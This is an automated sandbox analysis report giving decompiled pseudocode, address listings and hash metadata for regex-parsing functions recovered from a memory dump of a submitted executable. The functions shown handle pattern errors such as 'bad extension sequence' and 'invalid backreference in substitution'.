                                                    						 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
                                                    						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
                                                    						_t229 = E00402249();
                                                    					}
                                                    				} else {
                                                    					L00415226();
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t418 - 0xc));
                                                    				return _t229;
                                                    			}









































                                                    0x00402181
                                                    0x00402181
                                                    0x00402185
                                                    0x00000000
                                                    0x00402185
                                                    0x00401d78
                                                    0x00401d78
                                                    0x00401d7c
                                                    0x00401d84
                                                    0x00401d89
                                                    0x00401d90
                                                    0x00401d97
                                                    0x00401d9a
                                                    0x00401d9c
                                                    0x00401d9c
                                                    0x00401da3
                                                    0x00401da6
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401dac
                                                    0x00401daf
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db5
                                                    0x00401dbb
                                                    0x00401dbd
                                                    0x00401dc0
                                                    0x00401dc3
                                                    0x00401dce
                                                    0x00401dd1
                                                    0x00401dd4
                                                    0x00401de6
                                                    0x00401def
                                                    0x00401dfa
                                                    0x00401e01
                                                    0x00401e07
                                                    0x00401e1c
                                                    0x00401e30
                                                    0x00401e3c
                                                    0x00401e41
                                                    0x00401e53
                                                    0x00401e57
                                                    0x00401e62
                                                    0x00401e66
                                                    0x00401e76
                                                    0x00401e7e
                                                    0x00401e86
                                                    0x00401e8a
                                                    0x00401e8d
                                                    0x00401e9f
                                                    0x00401ea5
                                                    0x00401ead
                                                    0x00401eaf
                                                    0x00401eb0
                                                    0x00401eb7
                                                    0x00401ebe
                                                    0x00401ec4
                                                    0x00401ec6
                                                    0x00401ec9
                                                    0x00401ecc
                                                    0x00401ece
                                                    0x00401ed0
                                                    0x00401ed0
                                                    0x00401ed9
                                                    0x00401ee0
                                                    0x00401ee3
                                                    0x00401ee6
                                                    0x00401ee9
                                                    0x00401eec
                                                    0x00401efd
                                                    0x00401f01
                                                    0x00401f0a
                                                    0x00401f1c
                                                    0x00401f23
                                                    0x00401f2c
                                                    0x00401f34
                                                    0x00401f38
                                                    0x00401f42
                                                    0x00401f46
                                                    0x00401f52
                                                    0x00401f56
                                                    0x00401f5b
                                                    0x00401f5f
                                                    0x0040218b
                                                    0x0040218b
                                                    0x0040218b
                                                    0x00401b71
                                                    0x00401b71
                                                    0x00401b75
                                                    0x00401b7d
                                                    0x00401b82
                                                    0x00401b8e
                                                    0x00401b93
                                                    0x00401b9c
                                                    0x00401ba3
                                                    0x00401ba6
                                                    0x00401ba9
                                                    0x00401bab
                                                    0x00401bab
                                                    0x00401bb2
                                                    0x00401bb5
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bbb
                                                    0x00401bbe
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc4
                                                    0x00401bca
                                                    0x00401bcd
                                                    0x00401bd0
                                                    0x00401bda
                                                    0x00401bdd
                                                    0x00401be0
                                                    0x00401bf2
                                                    0x00401c05
                                                    0x00401c0a
                                                    0x00401c0f
                                                    0x00401c1e
                                                    0x00401c22
                                                    0x00401c31
                                                    0x00401c3f
                                                    0x00401c42
                                                    0x00401c47
                                                    0x00401c4a
                                                    0x00401c4c
                                                    0x00401c59
                                                    0x00401c4e
                                                    0x00401c52
                                                    0x00401c52
                                                    0x00401c62
                                                    0x00401c66
                                                    0x00401c66
                                                    0x00401c68
                                                    0x00401c6a
                                                    0x00401c6e
                                                    0x00401c70
                                                    0x00401c70
                                                    0x00401c72
                                                    0x00401c72
                                                    0x00401c76
                                                    0x00000000
                                                    0x00000000
                                                    0x00401c7d
                                                    0x00401c80
                                                    0x00401c81
                                                    0x00401c84
                                                    0x00401c86
                                                    0x00401c88
                                                    0x00401c8a
                                                    0x00401c8e
                                                    0x00401c91
                                                    0x00401c93
                                                    0x00401c99
                                                    0x00401caa
                                                    0x00401cad
                                                    0x00401cb1
                                                    0x00401cb3
                                                    0x00401cb5
                                                    0x00401cb5
                                                    0x00401cc0
                                                    0x00401cca
                                                    0x00401cce
                                                    0x00401cd4
                                                    0x00401cdb
                                                    0x00401cdb
                                                    0x00401ce0
                                                    0x00000000
                                                    0x00401ce0
                                                    0x00000000
                                                    0x00401c86
                                                    0x00401c72
                                                    0x00401ce3
                                                    0x00401ce9
                                                    0x00401cec
                                                    0x00401cef
                                                    0x00401cf2
                                                    0x00401cf5
                                                    0x00401cfa
                                                    0x00401d06
                                                    0x00401d07
                                                    0x00401d08
                                                    0x00401d0c
                                                    0x00401d0f
                                                    0x00401d14
                                                    0x00401d15
                                                    0x00401d1f
                                                    0x00401d22
                                                    0x00401d27
                                                    0x00401d2e
                                                    0x00401d33
                                                    0x00401d37
                                                    0x00401d3f
                                                    0x00401d43
                                                    0x00401d48
                                                    0x00401d52
                                                    0x00401d57
                                                    0x00401d5e
                                                    0x00401d65
                                                    0x00401d65
                                                    0x00401b5e
                                                    0x00401b5e
                                                    0x00401b5e
                                                    0x00402196
                                                    0x0040219e

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: H_prologclockstrlen
                                                    • String ID: ---------------------------------------------$+&@$>$@$`vA$`vA$`vA$dvA
                                                    • API String ID: 3760762678-3690534125
                                                    • Opcode ID: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
                                                    • Instruction ID: 3512c44382567f2ea4b4915ac8f057547d101fd7276799898dd384eece168e15
                                                    • Opcode Fuzzy Hash: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
                                                    • Instruction Fuzzy Hash: 4C127131804209EFDF14EFA4CD85BEDBB74BF54304F1440AAF815A7292DBB85A85CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E00404A98(signed int __ebx) {
                                                    				void* _t164;
                                                    				intOrPtr _t174;
                                                    				intOrPtr _t188;
                                                    				signed int _t192;
                                                    				intOrPtr _t193;
                                                    				signed int _t204;
                                                    				intOrPtr _t221;
                                                    				intOrPtr _t222;
                                                    				intOrPtr _t223;
                                                    				intOrPtr _t224;
                                                    				void* _t231;
                                                    				intOrPtr _t233;
                                                    				signed int _t236;
                                                    				intOrPtr* _t262;
                                                    				signed int _t287;
                                                    				signed int _t288;
                                                    				signed int _t290;
                                                    				void* _t294;
                                                    				signed int _t301;
                                                    				signed int _t310;
                                                    				signed char _t311;
                                                    				intOrPtr* _t323;
                                                    				signed int* _t329;
                                                    				char* _t330;
                                                    				intOrPtr _t335;
                                                    				char* _t337;
                                                    				intOrPtr _t338;
                                                    				char* _t339;
                                                    				char* _t340;
                                                    				intOrPtr _t341;
                                                    				void* _t344;
                                                    
                                                    				_t236 = __ebx;
                                                    				 *((char*)(_t344 - 0x15)) = 1;
                                                    				E004079C9(__ebx + 0x43, _t344 + 0xc,  *((intOrPtr*)(__ebx + 0x47)), _t329);
                                                    				 *0x41720c();
                                                    				asm("sbb ecx, ecx");
                                                    				if(E004090FF( *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4), 0xffffffff) == 0) {
                                                    					L4:
                                                    					_t323 =  *((intOrPtr*)(_t236 + 0x27));
                                                    					 *((intOrPtr*)(_t344 - 0x28)) =  *( *(_t344 + 8));
                                                    					 *0x41720c();
                                                    					asm("sbb ecx, ecx");
                                                    					_t164 = E00406D0A( *((intOrPtr*)(_t344 + 0x10)), _t344 - 0x28,  ~( *(_t323 + 4)) &  *((intOrPtr*)(_t323 + 8)) +  *(_t323 + 4));
                                                    					__eflags = _t164 - 0x4b;
                                                    					if(_t164 < 0x4b) {
                                                    						L7:
                                                    						 *((char*)(_t344 - 0x80)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    						 *0x417230(0);
                                                    						_t330 = "bad extension sequence";
                                                    						 *0x417234(_t330, strlen(_t330));
                                                    						 *(_t344 - 4) = 0xd;
                                                    						E00404FA7(_t344 - 0xb0, _t344 - 0x80);
                                                    						_push(0x4196f8);
                                                    						_push(_t344 - 0xb0);
                                                    						 *((intOrPtr*)(_t344 - 0xb0)) = 0x417698;
                                                    						L004153FE();
                                                    						while(1) {
                                                    							 *0x41720c();
                                                    							asm("sbb ecx, ecx");
                                                    							_t174 = E00406B23( *((intOrPtr*)(_t344 + 0x10)), _t323,  ~( *( *((intOrPtr*)(_t236 + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x27)) + 8)) +  *( *((intOrPtr*)(_t236 + 0x27)) + 4));
                                                    							__eflags = _t174 - 2;
                                                    							if(_t174 == 2) {
                                                    								goto L16;
                                                    							}
                                                    							__eflags = _t174;
                                                    							if(_t174 == 0) {
                                                    								_t341 =  *((intOrPtr*)(_t236 + 0x27));
                                                    								 *0x41720c();
                                                    								_t287 =  *(_t341 + 4);
                                                    								_t221 =  *_t323;
                                                    								asm("sbb edx, edx");
                                                    								__eflags = ( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) - _t221;
                                                    								if(( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) != _t221) {
                                                    									_t222 = _t221 + 1;
                                                    									__eflags = _t222;
                                                    									 *_t323 = _t222;
                                                    								}
                                                    							}
                                                    							_t338 =  *((intOrPtr*)(_t236 + 0x27));
                                                    							 *0x41720c();
                                                    							_t204 =  *(_t338 + 4);
                                                    							asm("sbb ecx, ecx");
                                                    							__eflags = ( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) -  *_t323;
                                                    							if(( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) !=  *_t323) {
                                                    								continue;
                                                    							} else {
                                                    								 *((char*)(_t344 - 0x90)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    								 *0x417230(0);
                                                    								_t339 = "Expecting end of comment";
                                                    								 *0x417234(_t339, strlen(_t339));
                                                    								 *(_t344 - 4) = 0xe;
                                                    								E00404FA7(_t344 - 0xcc, _t344 - 0x90);
                                                    								 *((intOrPtr*)(_t344 - 0xcc)) = 0x417698;
                                                    								L004153FE();
                                                    								 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    								 *0x417230(0, _t344 - 0xcc, 0x4196f8);
                                                    								_t340 = "bad extension sequence";
                                                    								 *0x417234(_t340, strlen(_t340));
                                                    								 *(_t344 - 4) = 0xf;
                                                    								E00404FA7(_t344 - 0x70, _t344 - 0x48);
                                                    								_push(0x4196f8);
                                                    								_push(_t344 - 0x70);
                                                    								 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
                                                    								L004153FE();
                                                    								 *_t323 =  *((intOrPtr*)(_t344 - 0x28));
                                                    							}
                                                    							goto L16;
                                                    						}
                                                    					} else {
                                                    						__eflags = _t164 - 0x4e;
                                                    						if(_t164 > 0x4e) {
                                                    							goto L7;
                                                    						} else {
                                                    							_t288 = _t236;
                                                    							_t223 = E00404705(_t288,  *(_t344 + 8), 0,  *((intOrPtr*)(_t344 + 0x10)),  *((intOrPtr*)(_t344 + 0x14)));
                                                    							__eflags = _t223;
                                                    							 *(_t344 - 0x34) = _t288 & 0xffffff00 | __eflags != 0x00000000;
                                                    							 *((intOrPtr*)(_t344 - 0x30)) = _t223;
                                                    							_t290 =  *_t329;
                                                    							 *(_t344 - 4) = 0xc;
                                                    							 *_t329 = _t290 + 1;
                                                    							_push(_t236 + 4);
                                                    							_push(_t223);
                                                    							_push(_t290);
                                                    							_t224 = E004091BE(__eflags);
                                                    							 *((intOrPtr*)(_t344 - 0x1c)) = _t224;
                                                    							__eflags = _t224;
                                                    							 *((char*)(_t344 - 0x20)) = _t290 & 0xffffff00 | _t224 != 0x00000000;
                                                    							E0040BF91(_t344 - 0x14, _t344 - 0x20);
                                                    							E00406ED3(_t344 - 0x20);
                                                    							 *(_t344 - 0x34) =  *(_t344 - 0x34) & 0x00000000;
                                                    							 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
                                                    							_t294 = _t344 - 0x34;
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					 *0x41720c();
                                                    					asm("sbb ecx, ecx");
                                                    					_t231 = E00406B23( *((intOrPtr*)(_t344 + 0x10)),  *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4));
                                                    					_t352 = _t231 - 2;
                                                    					if(_t231 != 2) {
                                                    						goto L4;
                                                    					} else {
                                                    						_t14 =  *_t329 + 1; // 0x1
                                                    						 *_t329 = _t14;
                                                    						_t301 = __ebx + 4;
                                                    						_push(_t301);
                                                    						_push(1);
                                                    						_push( *_t329);
                                                    						_t233 = E00409146(_t301, _t352);
                                                    						 *((intOrPtr*)(_t344 - 0x1c)) = _t233;
                                                    						 *((char*)(_t344 - 0x20)) = _t301 & 0xffffff00 | _t233 != 0x00000000;
                                                    						E0040BF91(_t344 - 0x14, _t344 - 0x20);
                                                    						_t294 = _t344 - 0x20;
                                                    						L3:
                                                    						E00406ED3(_t294);
                                                    					}
                                                    				}
                                                    				L16:
                                                    				_t257 =  *((intOrPtr*)(_t344 - 0x10));
                                                    				if( *((intOrPtr*)(_t344 - 0x10)) != 0) {
                                                    					E00406F41(_t257);
                                                    					do {
                                                    						_push( *((intOrPtr*)(_t344 + 0x14)));
                                                    						_push( *((intOrPtr*)(_t344 + 0x10)));
                                                    						_push( *((intOrPtr*)(_t344 - 0x10)));
                                                    						_push( *(_t344 + 8));
                                                    					} while (E004050B8(_t236) != 0);
                                                    					E00406F61( *((intOrPtr*)(_t344 - 0x10)), _t344 - 0x24, _t236 + 4);
                                                    					_t325 = _t344 - 0x38;
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsb");
                                                    					if( *((char*)(_t344 - 0x15)) != 0) {
                                                    						_t101 =  *((intOrPtr*)(_t344 - 0x10)) + 8; // 0x8
                                                    						if(E00407CC2(_t101) > 2) {
                                                    							 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    							 *0x417230(0);
                                                    							_t337 = "Too many alternates in conditional subexpression";
                                                    							 *0x417234(_t337, strlen(_t337));
                                                    							 *(_t344 - 4) = 0x12;
                                                    							E00404FA7(_t344 - 0x70, _t344 - 0x48);
                                                    							_push(0x4196f8);
                                                    							_push(_t344 - 0x70);
                                                    							 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
                                                    							L004153FE();
                                                    						}
                                                    					}
                                                    					_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    					if( *(_t344 - 0x38) != 0 &&  *(_t262 + 0x10) == 0) {
                                                    						_t192 = E0040507F( *((intOrPtr*)(_t236 + 4)), 0x10d);
                                                    						 *(_t344 + 8) = _t192;
                                                    						 *(_t344 - 4) = 0x13;
                                                    						if(_t192 == 0) {
                                                    							_t193 = 0;
                                                    							__eflags = 0;
                                                    						} else {
                                                    							_t193 = E004074E9(_t192,  *((intOrPtr*)(_t344 - 0x37)),  *((intOrPtr*)(_t344 - 0x33)),  *((intOrPtr*)(_t344 - 0x2f)));
                                                    						}
                                                    						 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
                                                    						_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    						 *((intOrPtr*)(_t236 + 0x4f)) = _t193;
                                                    					}
                                                    					_t310 =  *(_t262 + 0x10);
                                                    					if(_t310 != 0xffffffff) {
                                                    						_t335 =  *((intOrPtr*)(_t344 + 0x14));
                                                    						_t126 = _t335 + 4; // 0x405058
                                                    						_t188 =  *_t126;
                                                    						if(_t188 == 0) {
                                                    							L31:
                                                    							 *(_t344 + 8) =  *(_t344 + 8) & 0x00000000;
                                                    							E00407584(_t335, _t325,  *(_t262 + 0x10) + 1, _t344 + 8);
                                                    							_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    						} else {
                                                    							_t127 = _t335 + 8; // 0x0
                                                    							_t325 =  *_t127 - _t188 >> 2;
                                                    							if(_t310 >=  *_t127 - _t188 >> 2) {
                                                    								goto L31;
                                                    							}
                                                    						}
                                                    						_t134 = _t335 + 4; // 0x405058
                                                    						 *((intOrPtr*)( *_t134 +  *(_t262 + 0x10) * 4)) = _t262;
                                                    						_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    					}
                                                    					_t311 =  *(_t344 - 0x4c);
                                                    					 *(_t344 - 0x34) = _t311;
                                                    					 *((intOrPtr*)(_t344 - 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 - 0x54)))) - _t311;
                                                    					 *((intOrPtr*)( *_t262 + 0x34))(_t344 - 0x34);
                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x10)))) =  *((intOrPtr*)(_t344 - 0x50));
                                                    				}
                                                    				 *(_t344 - 0x14) =  *(_t344 - 0x14) & 0x00000000;
                                                    				 *(_t344 - 4) =  *(_t344 - 4) | 0xffffffff;
                                                    				E00406ED3(_t344 - 0x14);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t344 - 0xc));
                                                    				return  *((intOrPtr*)(_t344 - 0x10));
                                                    			}



































                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionThrowstrlen$H_prolog
                                                    • String ID: Expecting end of comment$Too many alternates in conditional subexpression$bad extension sequence
                                                    • API String ID: 875129476-4221926769
                                                    • Opcode ID: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
                                                    • Instruction ID: 0d6a007eb94e37c954dd8b579f3e195dca48f335e64544f17c8c6cf0d3b22ef3
                                                    • Opcode Fuzzy Hash: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
                                                    • Instruction Fuzzy Hash: A6E1A471A0121ADFCF14DF64C890AEEB7B5FF88304F14416EE816A7281DB78AD45CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    [Figure: control-flow graph for function 4061be; legend: Executed / Not Executed]
                                                    C-Code - Quality: 23%
                                                    			E004061BE(intOrPtr __ecx) {
                                                    				signed int _t158;
                                                    				signed int _t166;
                                                    				signed int _t178;
                                                    				signed int _t180;
                                                    				signed int _t184;
                                                    				signed int _t185;
                                                    				void* _t190;
                                                    				signed int _t216;
                                                    				void* _t237;
                                                    				signed int _t265;
                                                    				void* _t317;
                                                    				signed int _t320;
                                                    				signed int _t324;
                                                    				void* _t325;
                                                    				void* _t329;
                                                    				void* _t333;
                                                    				signed int _t334;
                                                    				char* _t336;
                                                    				char* _t337;
                                                    				void* _t338;
                                                    				void* _t340;
                                                    				void* _t341;
                                                    				void* _t345;
                                                    
                                                    				L004153D0();
                                                    				_t341 = _t340 - 0x88;
                                                    				_t334 =  *(_t338 + 8);
                                                    				 *((intOrPtr*)(_t338 - 0x24)) = __ecx;
                                                    				 *0x41720c(_t317, _t333, _t237);
                                                    				 *(_t338 + 8) =  *(_t334 + 4);
                                                    				 *((intOrPtr*)(_t338 - 0x20)) =  *((intOrPtr*)(__ecx + 0x13));
                                                    				 *(_t338 - 0x18) = 0;
                                                    				 *(_t338 - 0x14) = 0;
                                                    				 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 0;
                                                    				while(1) {
                                                    					L1:
                                                    					 *(_t338 - 0x10) = 0;
                                                    					while(1) {
                                                    						L2:
                                                    						 *0x41720c();
                                                    						_t158 =  *(_t334 + 4);
                                                    						asm("sbb ecx, ecx");
                                                    						if(( ~_t158 &  *((intOrPtr*)(_t334 + 8)) + _t158) ==  *(_t338 + 8)) {
                                                    							break;
                                                    						}
                                                    						 *0x41720c();
                                                    						asm("sbb ecx, ecx");
                                                    						_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
                                                    						_t345 = _t320 - 0x25;
                                                    						if(_t345 > 0) {
                                                    							__eflags = _t320 - 0x26;
                                                    							if(_t320 == 0x26) {
                                                    								 *0x41720c();
                                                    								_t166 =  *(_t334 + 4);
                                                    								asm("sbb ecx, ecx");
                                                    								__eflags = ( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) -  *(_t338 + 8);
                                                    								if(( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) ==  *(_t338 + 8)) {
                                                    									goto L50;
                                                    								} else {
                                                    									__eflags =  *(_t338 - 0x10);
                                                    									if( *(_t338 - 0x10) != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									 *0x41720c();
                                                    									 *(_t338 + 8) =  *(_t338 + 8) + 1;
                                                    									 *(_t338 - 0x10) = 1;
                                                    									 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								__eflags = _t320 - 0x27;
                                                    								if(__eflags == 0) {
                                                    									__eflags =  *(_t338 - 0x10);
                                                    									if( *(_t338 - 0x10) != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									 *0x41720c();
                                                    									_t178 =  *(_t338 + 8);
                                                    									_t265 = _t178 -  *(_t334 + 4);
                                                    									__eflags = _t265;
                                                    									 *(_t338 - 0x14) = _t265;
                                                    									while(1) {
                                                    										 *(_t338 - 0x1c) = _t178;
                                                    										 *0x41720c();
                                                    										_t180 =  *(_t334 + 4);
                                                    										asm("sbb ecx, ecx");
                                                    										__eflags = ( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) -  *(_t338 + 8);
                                                    										if(( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) ==  *(_t338 + 8)) {
                                                    											break;
                                                    										}
                                                    										 *0x41720c();
                                                    										asm("sbb ecx, ecx");
                                                    										_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
                                                    										__eflags = _t320;
                                                    										if(_t320 == 0) {
                                                    											_t97 = _t338 + 8;
                                                    											 *_t97 =  *(_t338 + 8) + 1;
                                                    											__eflags =  *_t97;
                                                    											goto L40;
                                                    										} else {
                                                    											__eflags = _t320 - 0x2c;
                                                    											if(_t320 != 0x2c) {
                                                    												L40:
                                                    												_t178 =  *(_t338 + 8);
                                                    												continue;
                                                    											}
                                                    										}
                                                    										break;
                                                    									}
                                                    									 *0x41720c();
                                                    									_t184 =  *(_t338 - 0x1c) -  *(_t338 - 0x14) -  *(_t334 + 4);
                                                    									__eflags = _t184;
                                                    									 *(_t338 - 0x10) = _t184;
                                                    									if(_t184 != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									_t185 = 0x2c;
                                                    									__eflags = _t320 - _t185;
                                                    									if(_t320 != _t185) {
                                                    										goto L30;
                                                    									} else {
                                                    										_t272 =  *((intOrPtr*)(_t338 + 0x10));
                                                    										 *(_t338 - 0x14) = _t185;
                                                    										 *(_t338 - 0x18) = 2;
                                                    										_push(_t338 - 0x18);
                                                    										_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
                                                    										_t190 = _t338 - 0x44;
                                                    										goto L29;
                                                    									}
                                                    								} else {
                                                    									if(__eflags <= 0) {
                                                    										goto L31;
                                                    									} else {
                                                    										__eflags = _t320 - 0x2c;
                                                    										if(_t320 > 0x2c) {
                                                    											goto L31;
                                                    										} else {
                                                    											__eflags =  *(_t338 - 0x10);
                                                    											if( *(_t338 - 0x10) != 0) {
                                                    												E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x58,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    											}
                                                    											_t272 =  *((intOrPtr*)(_t338 + 0x10));
                                                    											_push(_t338 - 0x18);
                                                    											 *(_t338 - 0x18) = 2;
                                                    											 *(_t338 - 0x14) = _t320;
                                                    											_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
                                                    											_t190 = _t338 - 0x2c;
                                                    											L29:
                                                    											_push(_t190);
                                                    											E00407990(_t272);
                                                    											L30:
                                                    											 *(_t338 - 0x18) = 0;
                                                    											 *0x41720c();
                                                    											 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
                                                    											goto L1;
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L54;
                                                    							}
                                                    						} else {
                                                    							if(_t345 == 0) {
                                                    								 *0x41720c();
                                                    								_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    								__eflags =  *(_t338 - 0x10);
                                                    								 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    								if( *(_t338 - 0x10) != 0) {
                                                    									E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    								}
                                                    								 *(_t338 - 0x18) = 1;
                                                    								 *(_t338 - 0x14) = 0;
                                                    								goto L21;
                                                    							} else {
                                                    								_t325 = _t320 - 0x22;
                                                    								if(_t325 == 0) {
                                                    									 *0x41720c();
                                                    									asm("sbb ecx, ecx");
                                                    									_t216 = E004090FF(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x24)) + 0xf)) - 1);
                                                    									_t341 = _t341 + 0xc;
                                                    									__eflags = _t216;
                                                    									 *(_t338 - 0x1c) = _t216;
                                                    									if(_t216 == 0) {
                                                    										 *((char*)(_t338 - 0x40)) =  *((intOrPtr*)(_t338 + 0x13));
                                                    										 *0x417230(0);
                                                    										_t337 = "invalid backreference in substitution";
                                                    										 *0x417234(_t337, strlen(_t337));
                                                    										 *(_t338 - 4) = 0;
                                                    										E00404FA7(_t338 - 0x78, _t338 - 0x40);
                                                    										_push(0x4196f8);
                                                    										_push(_t338 - 0x78);
                                                    										 *((intOrPtr*)(_t338 - 0x78)) = 0x417698;
                                                    										L004153FE();
                                                    										L50:
                                                    										 *((char*)(_t338 - 0x54)) =  *((intOrPtr*)(_t338 + 0x13));
                                                    										 *0x417230(0);
                                                    										_t336 = "expecting escape sequence in substitution string";
                                                    										 *0x417234(_t336, strlen(_t336));
                                                    										 *(_t338 - 4) = 1;
                                                    										E00404FA7(_t338 - 0x94, _t338 - 0x54);
                                                    										_t158 = _t338 - 0x94;
                                                    										_push(0x4196f8);
                                                    										_push(_t158);
                                                    										 *(_t338 - 0x94) = 0x417698;
                                                    										L004153FE();
                                                    									} else {
                                                    										 *0x41720c();
                                                    										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    										__eflags =  *(_t338 - 0x10);
                                                    										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    										if( *(_t338 - 0x10) != 0) {
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    										}
                                                    										 *(_t338 - 0x18) = 1;
                                                    										 *(_t338 - 0x14) =  *(_t338 - 0x1c);
                                                    										goto L21;
                                                    									}
                                                    								} else {
                                                    									_t329 = _t325 - 1;
                                                    									if(_t329 == 0) {
                                                    										 *0x41720c();
                                                    										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    										__eflags =  *(_t338 - 0x10);
                                                    										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    										if( *(_t338 - 0x10) != 0) {
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    										}
                                                    										 *(_t338 - 0x14) =  *(_t338 - 0x14) | 0xffffffff;
                                                    										 *(_t338 - 0x18) = 1;
                                                    										goto L21;
                                                    									} else {
                                                    										if(_t329 != 1) {
                                                    											L31:
                                                    											 *(_t338 - 0x10) =  *(_t338 - 0x10) + 1;
                                                    											 *(_t338 + 8) =  *(_t338 + 8) + 1;
                                                    											continue;
                                                    										} else {
                                                    											 *0x41720c();
